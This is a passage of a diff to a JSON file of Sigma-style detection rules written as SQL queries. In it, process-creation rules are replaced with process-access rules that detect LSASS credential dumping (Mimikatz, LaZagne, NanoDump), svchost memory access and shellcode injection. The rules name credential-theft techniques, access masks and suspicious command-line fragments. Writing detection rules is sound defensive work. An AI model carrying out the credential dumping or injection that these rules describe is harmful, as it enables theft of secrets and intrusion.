'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage 
LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": 
"proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": 
"Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - 
"id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", 
- "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": 
"proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 
'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost 
Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. 
Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR 
SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage 
LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR 
